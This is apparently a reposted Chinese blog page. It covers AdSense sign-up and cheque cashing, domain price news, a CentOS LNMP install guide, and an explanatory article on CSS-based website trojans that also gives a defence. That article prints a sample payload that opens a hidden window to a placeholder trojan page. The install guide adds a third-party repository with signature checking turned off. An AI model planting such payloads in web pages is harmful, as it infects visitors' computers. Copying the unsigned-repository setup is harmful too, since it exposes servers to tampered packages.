申請Google AdSense帳戶完全攻略[图文]

2010年2月27日星期六 | | 0 评论 |

相信您來到這裡,對Google AdSense提供的出版者廣告分紅計劃充滿興趣,並不是每個人對於電腦及網路的操作十分擅長,這一點筆者知道,所以撰寫了關於AdSense從最基本的帳戶申請開始,到把AdSense廣告原始碼放入您的網頁或部落格中的步驟,都會用最簡單易懂、圖文並茂的方式來引導讀者們一起參與,接下來,讓我們進入正題。

基本的認識

對於AdSense的原理您可以參考筆者所撰Google AdSense介紹及運作原理一文,閱讀後,對於獎金的來源及Google AdSense、AdWords之間的關係有了充份的瞭解後,我們可以開始準備申請AdSense帳戶了。

申請AdSense帳戶

在Google AdSense for Content開放後,一般使用者可以申請帳戶的管道有兩種模式:

1. 點選AdSense會員網站上AdSense推薦組

2. 從Google的網站中找到AdSense帳戶的申請按紐。

因為現在AdSense已經很普及了,所以可以在很多AdSense會員網站中看到AdSense推薦組,如下圖所示,AdSense產品推薦也是加入的管道之一,如果是透過這樣的推薦廣告加入AdSense帳戶,您若在規定的期間內達到一定的獎金水準,推薦人就會獲得推薦轉換獎金,詳細的細節可以參考Simon撰寫的更容易賺的AdSense推薦和AdWord推薦,內文中有詳細的獎金規定。也就是說,如果您點選了筆者網站的推薦,變成AdSenseor的下線,以現行制度來看,在您達到第一筆5美元的收益後,筆者就跟著收到Google分配給筆者5美元的推薦轉換獎金。如果您覺得AdSenseor在AdSense及SEO上對您有幫助,可以用本頁上方「此網站推薦使用 Google AdSense 來顯示與內容相關的廣告」的連結加入Google AdSense計劃,就是給筆者最實質的鼓勵了。

423_1.gif

另一個申請帳戶的管道,當然就是透過Google網站所提供的加入連結,不過對新手來說,似乎不大好找。您可以在以下幾個入口找到申請AdSense帳戶的連結:

1. Google的完全手冊:Google首頁 -> Google完全手冊 -> Google AdSense

423_2.gif

進入http://www.google.com/後,點選Google完全手冊。

adsense.gif

在Google完全手冊中可以找到Google AdSense的申請入口。按下會進入下一頁如下圖。

adsense2.gif

如果您已經有了AdSense帳戶,可直接在右上角文字輸入方塊表單進行登入。但相信會閱讀本篇的讀者應該還未加入,請點選紅框中的按紐"按這裡提出申請"。

adsense3.gif

出現帳戶申請表格,共有五個部份。一:網站資訊。二:聯絡資訊。三:電話號碼。四:產品選擇。五:計劃策策。以下分別抓圖詳細說明。

adsense4.gif

在網站資訊這個部份,如果您有許多網站要加入AdSense,別擔心,只要申請一個帳戶後,通通可以加入。在這裡填入您最主要的網站網址。網站語言請選擇"中文(繁體)"。

adsense51.gif

上圖為聯絡資訊,是註冊表單中最重要的一部份,因為一旦填錯了格式或地址,可能收不到要收支票前的地址確認用PIN碼,甚至領到支票了因名字不符而無法申領。

名字的部份,請用您的中文名字的單純英譯,建議使用我國常用的威妥瑪拼音或國音二式拼音,二者取其中一種使用。讀者可在這裡查詢,中文文句譯音查詢,千萬不要用自己取的英文名字是JACK而把名字的部份填入Jack Lin,否則領到支票時也因為人名不符而無法兌現。地址的部份,台北市使用的是和中國大陸一樣的"漢語拼音",而台灣其它地址用的是"通用拼音",兩者音似而英文拼法不同,為避免郵差先生找不到貴住址,請用所在地慣用的英文地址格式。您可以使用台灣郵政提供的中文地址英譯服務

adsense6.gif

同一個地址,查詢後會兩種拼音的地址讓您選擇使用。郵遞區也可在查詢中文地址英譯時找到3+2的郵遞區號。

最後第三個部份,請填寫電話號碼。如果您手機號碼為0912-345678,加上國碼應填寫:+886-912-345678;反之,如果是市話電話號碼為02-22222222,加上國碼應填寫:+886-2-22222222。

最後兩個部份,產品選擇及計劃政策則全部勾選,然後按"提交資料"。

adsense7.gif

在這個階段,"哪些最能說明您是怎樣的人"有兩個選項,選擇第一個則會出現Google帳號登入表單,輸入帳號密碼後即完成。如果您未曾有Google帳號,那麼選擇第二個,一樣會出現Google帳號簡易申請表單,不管您是選擇那一個,填寫完後送出。

adsense8.gif

成功!接下來就等AdSense開通的電子郵件通知。最後預祝您在AdSense上有不錯的收益。

轉貼請註明出處
AdSenseor網路觀察家
網址:http://www.adsenseor.com/

其它連結

常見問題

大家赶快到我们的网站去注册属于您的域名吧.. 域名注册   捷飞网络  虚拟主机   心动不如行动.赶快出动吧..

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
如何申请Google AdSense完全手册
一、注册Google AdSense到https://www.google.com/adsense注册。...
 

如何申请Google AdSense完全手册

2010年2月26日星期五 | | 0 评论 |

一、注册Google AdSense

https://www.google.com/adsense 注册。如果以前注册过Google AdWords(Google广告词——对关键字进行右侧付费推广)那么就能使用您的Google AdWords密码登录,开通Google AdSense了。

Google提示不支持中文,注册时填写拼音

需要填写

您输入的帐户信息如下:(XX代表隐藏站长的信息)


收款人:Zhang Dasan或Dasan Zhang(这个信息一定不能错,一旦提交永远不得更改。姓、名顺序可以按中文习惯,也可以按英语习惯颠倒过来)
地址:Room 102, Building 3
地址(延续):Hu li Cun 2#
城市:Gongzhou
州、省或地区:Gongdong
邮政编码:210000
国家/地区:中国
电话:+86-20-85412654(注意:国家代码和区号前不要加0)
产品:AdSense for content(针对内容的AdSense)和AdSense for search(针对搜索的AdSense)
网站:www.yourwebsite.com
网站语言:中文(简体)


请在继续前确认所有信息都是正确的。
在此之后不能更改付款人姓名或国家/地区名称。

二、等待Google来信

等了两天,Google来信如下:


标题:欢迎光临_Google_AdSense
祝贺您!

您的 Google AdSense 申请已得到批准。现在,您可以启用帐户,几分钟后就会开始向您的网站投放 Google 广告和提供 AdSense for search (针对搜索的
AdSense)。

第 1 步:启用帐户。
请访问 https://www.google.com/adsense?hl=zh_CN,然后使用申请中所提交的电子邮件地址和密码登录到自己的帐户,并选择同意 AdSense 条款。

第 2 步:将 AdSense 代码粘贴到您的网页。
只需按照"广告布局代码"页和"搜索代码"页中的说明进行*作,即可将 Google 代码复制并粘贴到您的网站中。几分钟后就会开始向您的网站投放 Google 广告和提
供 AdSense for search。

第 3 步:查看结果。
广告开始投放后,您就可以通过自己帐户中的在线报告随时查看收入情况。请注意,如果您的网站中包含以下任一内容,都有可能无法从 AdSense 中获得最大收
入:
* robots.txt
* 框架
* 表单与动态内容
* 过多的图像
* 要求登录和输入密码

有关针对此计划优化网站的更多技术指南与建议,请访问:
https://www.google.com/adsense/faq-tech?hl=zh_CN

重要注意事项:
* 如果 Google 尚未抓取您的网站,则可能需要数小时才能看到有针对性的广告。
您在此期间可能会看到公益广告(这些广告无法为您带来任何收入)。

* 如果您的网页还未列入 Google 搜索的索引中,Google 将不能返回SiteSearch 结果。请注意将 SiteSearch 添加至任何网页,都不会使此网页进入我们漫游器的等待抓取队列。如果您希望采用手动方式将贵网站的主要网址添加到我们的抓取索引,则可以通过http://www.google.com/intl/zh-CN/addurl.html
进行这一*作。采用这一方式提交贵网站不能确保网站一定会被加入到 Google 索引中。

* 网站发布商或由发布商征召的第三方不得采用人为方式或通过漫游器产生欺诈性
点击(恶意点击)。点击自己网站上的广告有违此政策,所以请不要因任何原因点
击这些广告。我们会监控所有的 AdSense 活动,并且会停用违反此政策的任何发
布商的帐户。详细信息,请参阅 Google AdSense 条款,地址是:
https://www.google.com/adsense/localized-terms?hl=zh_CN

有什么问题?
请随时与我们联系,我们的电子邮件地址是 [email protected]

欢迎光临 Google AdSense。我们热切期盼能够帮助您全面发挥贵网站的创收潜力。

Google 小组敬上

为了让大家登录方便,首页放了个Google AdSense登录的地址,可以直接点击。

由于Google的中文意思表达不明确,并且Google对于很多细节都避而不谈,所以dan迷茫了两天。通过几天的试验和询问朋友,终于明白很多东西。

Google AdSense分为AdSense广告和AdSense搜索。AdSense广告就是放google的广告条;AdSense搜索就是提供个性化颜色的Google搜索,上面有时会出现广告条。也就是说,只有点击广告条才能赚钱,否则显示得再多也是徒劳!

进入"广告设置"栏目。可以设置"广告颜色"等细节,最后生成一段代码,比如

<script type="text/javascript"><!--
google_ad_client = "ID";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_channel ="";
//--></script>......

然后你就粘贴到你的网页上就可以了。

在"搜索设置"栏目中,设置后又能得到一段代码

<!-- Search Google -->
.....
<!-- Search Google -->

同样,粘贴即可。

上传网页

上传后,并不能马上显示广告,有的可能要过段时间才行。有的则显示没有任何收入的公益广告!根据Google的流程来看是这样的:

网页执行JavaScript程序,Google服务器来抓当前的网页,然后Google服务器分析网页内容,在你的网页上显示相关的广告。看来Google AdSense的确很聪明。

查询收入

Google AdSense是每4个小时更新一次点击记录。加上美国时间比中国时间晚12小时,所以再查询时不要疑惑。前天有3个点击,前两个赚了0.44美元,第3 个外国广告的点击居然有6美元!不过,昨天看了一下统计,居然变成了每个点击0.04美元。不知道Google的浮动算法是什么,Google对于 AdSense的很多东西都是保密的。

Google AdSense支付

当你的广告费满100美元时,Google会寄支票给你。带上支票和身份证。另外带点钱(100元就够了),去中国银行(好象只有中行可以办托收)办理光票托收手续(这种支票并不是那种凭身份证就能去银行取钱的那种,所以叫"光票")。

首先,支票背面的指定位置需要你的签名,签名要和正面收款人的一致(别担心,银行工作人员都会告诉你的啦~~);

其次,您需要向银行交纳一定的手续费和支票的邮寄费(支票要寄到国外银行),所收费用根据各地情况而不同。邮寄费一般为10——12元人民币不等,手续费一般为支票金额的0.1%(不足10元按10元交纳);

再次,留下您的联系电话,将收据收好,大约1个月之后(准确的说是45天),银行会电话通知您款已到帐。

嗯,确实太长了,大致从你开始放广告,到收到第一笔钱,需要4个月左右。

最后,拿着您的收据和身份证再到外币柜台,这时您就可以见到您的美元了!(注:如果直接把美圆存到银行,要比把美圆取出,然后再存的利率要高一些~~)

注意:有的公司的支票是有有效期的,所以要尽快办理托收手续!比如,票面上标注"VOID AFTER 90 DAYS"表示支票在90天内有效。

七、疑问

Q: Google同意将代码放到多个网站上吗?
A: 虽然申请时填了一个网址,但是Google给了你一段代码,里面有你的 ID号,所以可以放在多个网站上。

Q: 如何避免Goolge的公益广告?
A: 公益广告是不可避免的,Google允许你在应该显示公益广告时换成你自己的广告,具体查看替换参数

Q:如果到了时间没有收到支票怎么办?会不会寄丢了?
A:如果你看到支付后,两月到三月没有收到,你就可以给这儿写封邮件去了 [email protected] ,可以用中文,你只需要告诉他你的支票的支付信息就行了。他们会用中文答复你把原来的支票止付,再给你邮寄,新的支票,并附上新寄的英文地址。

Q:为什么我的收入很少
A:如果你的访问量没有达到每日5-10万IP,PV一天15万以上的话,我估计你一个月也难收到一次支票(即不超过100美金)。另外还得看你的会员对你的支持了。当然个别的人点太多,是不会有效果的。也许还会扣钱。

From:网络

大家赶快到我们的网站去注册属于您的域名吧.. 域名注册   捷飞网络  虚拟主机   心动不如行动.赶快出动吧..

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
申请google adsense帐户注意事项
  google adsense是通过在自己网站上放置google提供的与网页内...
 

申请google adsense帐户注意事项

| | 0 评论 |

  google adsense是通过在自己网站上放置google提供的与网页内容相关的广告而获得广告点击收入的一种网络赚钱方法,google adsense也是广告点击佣金最高、可信度最高的广告联盟,获得众多大中型网站和个人网站的青睐,例如门户网站网易、IT门户网站天极网、赛迪网、 IT1681等均是google adsense广告联盟的会员,google adsense广告已经成为网站赚钱的重要途径之一。

  如果你拥有自己的网站并且内容合法,如果希望将网站访问量转化为收入,现在就可以免费申请google adsense: 。如果你希望顺利申请google adsense帐户,下面的申请google adsense帐户注意事项或许对你有所帮助。

申请google adsense帐户注意事项:

  (1)确保申请信息准确。申请google adsense需要经过google adsense工作人员人工审核,而且并非每个申请都能顺利通过,因此请确保你填写的各项信息准确。

  (2)掌握申请时机。在申请google adsense帐户时,有一项重要内容是你的网站网址,也就是说在正式申请之前你的网站应该已经正式发布,网站内容合法且比较丰富,你所申请的网站之前应该没有申请过google adsense帐户;如果你有多个网址,只需填写其中一个质量比较高的即可,申请获得批准后可以将广告代码放到其他网站上。

  (3)收款人姓名准确无误。这项信息关系到你收到google的支票后能否顺利到银行兑现现金的问题,不能马虎。而且一旦申请google adsense帐户成功,收款人姓名是不能更改的(中文名字和汉语拼音名字都不能修改),如果你借用别人的名字申请,将来获得的美元支票收款人是别人的名字,每次到银行办理支票托收手续就需要使用别人的身份证和银行帐户,想想该有多麻烦吧。

  (4)收款人地址的唯一性。首次申请google adsense时,如果你的地址已经被人申请使用过,那么申请可能会被拒绝,这种情况下,你可以更换一个地址可以重新申请。申请获得批准后可以修改收款人地址,不过收款人所在国家是不能修改的,如果在中国申请的google adsense帐户之后你到了另一个国家,只能委托本国的朋友代收支票了。

  (5)帐户类型应该选择个人还是企业?如果你有自己的公司并且有美元帐户,可以选择企业。不过根据经验,除非大型网站,一般情况下个人网站或者中小规模的网站都可以选择个人帐户,因为个人帐户支票可以方便地通过银行托收为个人帐户名下的活期存款,而企业帐户中的资金使用手续通常比较麻烦,尤其是企业美元帐户,要兑换人民币并且提现金往往比较复杂。

  (6)使用可靠的电子邮件地址,最好是google的免费邮箱gmail 。google adsense帐户申请无论是否通过审核,google都将通过你注册信息的电子邮件通知审核结果,但是很多邮箱可能被屏蔽而无法收到google的通知邮件。现在gmail已经开放了免费注册,如果你还没有gmail帐户,在申请google adsense帐户之前,最好先注册一个gmail邮箱。如果你使用的不是google的邮箱,另外一种可能情形是,虽然申请几天后仍然没有收到邮件通知,也可以尝试用自己的申请帐户(Email地址)登录google adsense,如果可以登录则表明申请已经获得通过。

  (7)珍惜你的google adsense发布商资格。前面已经说过,并非每个网站的申请都能顺利通过审核,因此当你的google adsense帐户申请获得批准之后,就成为google广告联盟的内容发布商了,拥有在自己网站上投放与网页内容相关的google广告的机会,要充分利用这一机会通过自己网站的访问量获得广告点击收入,并且严格遵守google adsens计划政策的相关说明,无论任何情况下不要点击自己网站上的广告,以免adsense帐户被取消(Google Adsense内容发布商帐号被取消的原因 ),否则以后你再也不能用自己的名字重新申请google adsense广告帐户了。

  申请google adsense帐户获得批准之后,就是尽快把adsense广告代码尽快放到网页中的合适位置(包括产品推介代码),跟踪管理google广告的展示和被点击情况,不断优化google adsense广告(登录adsense后台之后,可以看到详细的adsense广告优化指南),通过高质量的网站内容获得源源不断访问量的同时,也获得不断增加的广告点击收入。这样当你的google adsense帐户广告佣金达到100美元以上时,就可以等待接收google寄来的支票了。

大家赶快到我们的网站去注册属于您的域名和网站吧.. 域名注册   捷飞网络  虚拟主机   心动不如行动.赶快出动吧..

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
警惕CSS挂马攻击 CSS挂马攻防实战全面解析[木马病毒]
黑客们发现发现,用来制作网页特效的CSS代码,也可以用来挂马。...
 

警惕CSS挂马攻击 CSS挂马攻防实战全面解析[木马病毒]

2010年2月25日星期四 | | 0 评论 |

黑客们发现发现,用来制作网页特效的CSS代码,也可以用来挂马。

随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。

在我印象中,记忆最深刻的一次是百度空间CSS挂马。当时,百度空间推出没有多久,就有许多百度用户收到了类似"哈,节日快乐呀!热烈庆祝2008,心情好好,记住要想我!http://hi.baidu.com/XXXXX"的站内消息。

由于网址是百度空间的网址,许多用户认为不会存在安全问题,加上又有可能是自己朋友发来的,因此会毫不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继续传播。

由于蠕虫扩散非常严重,最终导致百度空间不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百度空间CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。

我建议大家在点击陌生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好还是使用一些带网页木马拦截功能的安全辅助工具。

黑客为什么选择CSS挂马?

在Web1.0时代,使用E挂马对于黑客而言,与其说是为了更好地实现木马的隐藏,倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中,黑客可以利用的手段也非常有限,即使采取了复杂的伪装,也很容易被识破,还不如E来得直接和有效。

但如今交互式的Web2.0网站越来越多,允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中,往往会提供丰富的功能,并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。

小百科:

CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。

黑客在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执行。这就如同你去一家知名且证照齐全的大医院看病,你非常信任医院,但是你所看的门诊却已经被庸医外包了下来,并且打着医院的名义利用你的信任成功欺骗了你。但是当你事后去找人算账时,医院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。

黑客们发现发现,用来制作网页特效的CSS代码,也可以用来挂马。

随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。

在我印象中,记忆最深刻的一次是百度空间CSS挂马。当时,百度空间推出没有多久,就有许多百度用户收到了类似"哈,节日快乐呀!热烈庆祝2008,心情好好,记住要想我!http://hi.baidu.com/XXXXX"的站内消息。

由于网址是百度空间的网址,许多用户认为不会存在安全问题,加上又有可能是自己朋友发来的,因此会毫不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继续传播。

由于蠕虫扩散非常严重,最终导致百度空间不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百度空间CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。

我建议大家在点击陌生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好还是使用一些带网页木马拦截功能的安全辅助工具。

黑客为什么选择CSS挂马?

在Web1.0时代,使用E挂马对于黑客而言,与其说是为了更好地实现木马的隐藏,倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中,黑客可以利用的手段也非常有限,即使采取了复杂的伪装,也很容易被识破,还不如E来得直接和有效。

但如今交互式的Web2.0网站越来越多,允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中,往往会提供丰富的功能,并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。

小百科:

CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。

黑客在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执行。这就如同你去一家知名且证照齐全的大医院看病,你非常信任医院,但是你所看的门诊却已经被庸医外包了下来,并且打着医院的名义利用你的信任成功欺骗了你。但是当你事后去找人算账时,医院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。

CSS挂马攻防实录

攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。

方式1:

Body

"background-image"在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过"background-image"配合t代码让网页木马悄悄地在用户的电脑中运行。

那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。

小百科:

使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,如同使用DIV对象那样精确地设置大小。

方式2:

Body

background-image:url(t:open("http://www.X.com/muma.htm","newwindow"," border="1″Height=0,Width=0,top=1000,center=0,toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no"))

方式1的CSS挂马技术,在运行时会出现空白的页面,影响网页访问者正常的访问,因此比较容易发现。不过在方式2中的这段代码,使用了t的Open 开窗,通过新开一个隐藏的窗口,在后台悄悄地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。

防网络服务器被挂马,通常会出现防病毒软件告警之类的信息。由于漏洞不断更新,挂马种类时刻都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志,发现异常信息,经常检查网站代码,使用网页木马检测系统,进行排查。

目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不过如果你选择过滤CSS的话,首先需要留意自己的相关网页是否有CSS的内容,因此我们仍然首推用阻断方式来防范CSS.阻断代码如下所示:

emiao1:expression(this.src="about:blank",this.outerHTML="");

将外域的木马代码的src重写成本地IE404错误页面的地址,这样,外域的t代码不会被下载。不过阻断方式也有天生致命的弱点,弱点的秘密我们将于下次揭晓。(作者:Barry)

我的QQ空间
[域名注册通知] 7月1日 .Com .Net域名涨价 涨幅7%-10%
根据全球最大的域名注册商Godaddy的客户邮件显示,之前传闻.COM...
 

[域名注册通知]7月1日 .Com .Net域名涨价 涨幅7%-10%

| | 0 评论 |

根据全球最大的域名注册商Godaddy的客户邮件显示,之前传闻.COM域名与.NET域名涨价的消息得到证实,威瑞信将在2010年7月1日上调.COM、.NET域名注册价格。

Godaddy邮件关于域名调价内容:

On July 1, 2010, VeriSign®, the registry for .COM and .NET, will increase prices – .COM will go up 7%, and .NET by 10%.

在2009年12月曾有媒体报道,威瑞信有意将.COM、.NET域名提价,国内注册商都表示不会在终端价格上跟从,仅仅提高代理商注册价格,这次价格调整,.com域名注册价格将从6.86美元提高到7.34美元,.net域名将从4.23美元提高到4.65美元。

自ICANN 1999年确立价格体系以来,威瑞信已宣布三次提价。在2007年10月,.com域名的批发价将由原先的6美元涨至6.42美元,涨幅7%;.Net域名批发价则由3.50美元涨至3.85美元,涨幅10%,巧合的是,这一涨幅与本次调价幅度一致,当时的调价还引发了.BIZ域名的价格上扬了7%。

早前国内部分注册商曾推出了.COM域名首年注册25元,不过低价注册域名一般无法转出。

     在1995年9月12日以前,.com、.net、.org下的域名是免费注册的,1995年9月13日起,.com、.net、.org下注册的域名需要交纳每年50美元的管理费用, 1998年4月1日起这个价格改为每年35美元。

1999年1月30日美国商务部颁布绿皮书, 概述了美国政府将于2000年1月30日私有化域名系统(DNS)及打破域名注册上的垄断,1999年6月5日,美国商业部又颁布白皮书,宣布成立 ICANN这一非赢利机构,并由它来管理域名系统(DNS)、根服务器和IP地址分配。

[相关阅读]

VeriSign威瑞信是美国一家专注于多种网络基础服务的上市公司,位于加州山景城。该公司将他们的业务统称为"智慧基础设施服务"(Intelligent Infrastructure Services)。

VeriSign威瑞信的主要业务有管理世界13台根服务器中的2台(A与J)、顶级域名中的.com和.net。

From :http://www.chinaz.com/Webmaster/report/022510G102010.html

特此通知.,, 所以大家赶快到我们的网站去注册属于您的域名吧.. 域名注册   捷飞网络  虚拟主机   心动不如行动.赶快出动吧..

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
轻松搞定CentOS+Nginx+PHP+MySQL标准生产环境[Vps]
PHP 5.3.1MySQL 5.0.89Nginx 0.8.33 或 0.7.65 (可选)这个可比...
 

轻松搞定CentOS+Nginx+PHP+MySQL标准生产环境[Vps]

| | 0 评论 |

PHP 5.3.1

MySQL 5.0.89

Nginx 0.8.33 或 0.7.65 (可选)

这个可比网上流传的什么一键安装包要好得多,强烈推荐此法安装,适合所有菜鸟和高手。我服务器上全用的源代码编译安装,也好不到哪去,还很费劲。我这个装完已经包含 php 的一些常用扩展, PDO,eaccelerator,memcache,tidy等等。

CentOS 最小化安装,然后先新建一个 repo

# vi /etc/yum.repos.d/centos.21andy.com.repo

放入如下内容

[21Andy.com]
name=21Andy.com Packages for Enterprise Linux 5 - $basearch
baseurl=http://www.21andy.com/centos/5/$basearch/
enabled=1
gpgcheck=0
protect=1

启用 EPEL repo

CentOS i386 输入如下命令

rpm -ihv http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-3.noarch.rpm

CentOS x86_64 输入如下命令

rpm -ihv http://download.fedora.redhat.com/pub/epel/5/x86_64/epel-release-5-3.noarch.rpm

然后导入key

rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL

复制代码

OK,一键安装吧

yum -y install nginx mysql-server php-fpm php-cli php-pdo php-mysql php-mcrypt php-mbstring php-gd php-tidy php-xml php-xmlrpc php-pear php-pecl-memcache php-eaccelerator

最后 yum -y update 一下,全是最新的

如果 nginx 你要用 0.7.65 最新稳定版,把

yum -y install nginx

换成

yum -y install nginx-stable

就可以了

装完你已经可以这样玩了

service mysqld start

service php-fpm start

service nginx start

别忘了设置开机启动

chkconfig --level 345 mysqld on

chkconfig --level 345 php-fpm on

chkconfig --level 345 nginx on

配置文件都在 /etc 下自己找

看看安装多自动

    Dependencies Resolved

    ==========================================================
    Package Arch Version Repository Size
    ==========================================================
    Installing:
    mysql x86_64 5.0.89-1.el5 21Andy.com 3.5 M
    mysql-server x86_64 5.0.89-1.el5 21Andy.com 10 M
    nginx x86_64 0.8.33-3.el5 21Andy.com 422 k
    php-cli x86_64 5.3.1-2.el5 21Andy.com 2.4 M
    php-eaccelerator x86_64 2:0.9.6-1.el5 21Andy.com 118 k
    php-fpm x86_64 5.3.1-2.el5 21Andy.com 1.2 M
    php-gd x86_64 5.3.1-2.el5 21Andy.com 110 k
    php-mbstring x86_64 5.3.1-2.el5 21Andy.com 1.1 M
    php-mcrypt x86_64 5.3.1-2.el5 21Andy.com 27 k
    php-mysql x86_64 5.3.1-2.el5 21Andy.com 84 k
    php-pdo x86_64 5.3.1-2.el5 21Andy.com 91 k
    php-pear noarch 1:1.9.0-1.el5 21Andy.com 420 k
    php-pecl-memcache x86_64 2.2.5-3.el5 21Andy.com 44 k
    php-tidy x86_64 5.3.1-2.el5 21Andy.com 31 k
    php-xml x86_64 5.3.1-2.el5 21Andy.com 115 k
    php-xmlrpc x86_64 5.3.1-2.el5 21Andy.com 48 k
    Installing for dependencies:
    gmp x86_64 4.1.4-10.el5 base 201 k
    libXaw x86_64 1.0.2-8.1 base 329 k
    libXmu x86_64 1.0.2-5 base 63 k
    libXpm x86_64 3.5.5-3 base 44 k
    libedit x86_64 2.11-2.20080712cvs.el5 epel 80 k
    libmcrypt x86_64 2.5.8-4.el5.centos extras 105 k
    libtidy x86_64 0.99.0-14.20070615.el5 epel 140 k
    php-common x86_64 5.3.1-2.el5 21Andy.com 554 k
    sqlite2 x86_64 2.8.17-5.el5 21Andy.com 165 k
    t1lib x86_64 5.1.1-7.el5 epel 208 k
    Updating for dependencies:
    libevent x86_64 1.4.12-1.el5 21Andy.com 129 k

    Transaction Summary
    ==========================================================
    Install 26 Package(s)
    Update 1 Package(s)
    Remove 0 Package(s)

以下分别测试我本地的虚拟机和 VPS 上 Nginx + php-fpm 的性能

我的本机虚拟机测试,配置为PD930 双核3.0G,2G内存,给虚拟机分配的是 1G 内存,安装的系统为 CentOS 5.4 64bit

测试内容为

<?php phpinfo();?>

500 并发测试,CPU使用率到了30%,系统负载在10左右,页面打开还是飞快

[[email protected] ~]# webbench -c 500 -t 30 http://127.0.0.1/
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/
500 clients, running 30 sec.

Speed=223504 pages/min, 21806556 bytes/sec.
Requests: 111752 susceed, 0 failed.

2000 并发测试,CPU使用率35%,系统负载在18左右,页面打开还是飞快

[[email protected] ~]# webbench -c 2000 -t 30 http://127.0.0.1/
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/
2000 clients, running 30 sec.

Speed=429494 pages/min, 39004788 bytes/sec.
Requests: 214747 susceed, 0 failed.

5000 并发测试,CPU使用率30%,系统负载到了35,页面打还速度还不错,看了这数据,前些天说的那个1500万PHP请求也没啥了

[[email protected] ~]# webbench -c 5000 -t 30 http://127.0.0.1/
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/
5000 clients, running 30 sec.

Speed=788986 pages/min, 66952700 bytes/sec.
Requests: 394493 susceed, 0 failed.

还不过瘾,变态一下,10000并发

10000 并发,CPU使用还是不到30%,系统负载从60左右一直升到1000左右,晕死!居然还能打开!只是有点卡!负载到600多的时候居然不卡!疯了,我这还是虚拟机,webbench 还是在自己机上开的,汗,太强了

[[email protected] ~]# webbench -c 10000 -t 30 http://127.0.0.1/
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/
10000 clients, running 30 sec.

Speed=1513718 pages/min, -17973622 bytes/sec.
Requests: 756859 susceed, 0 failed.

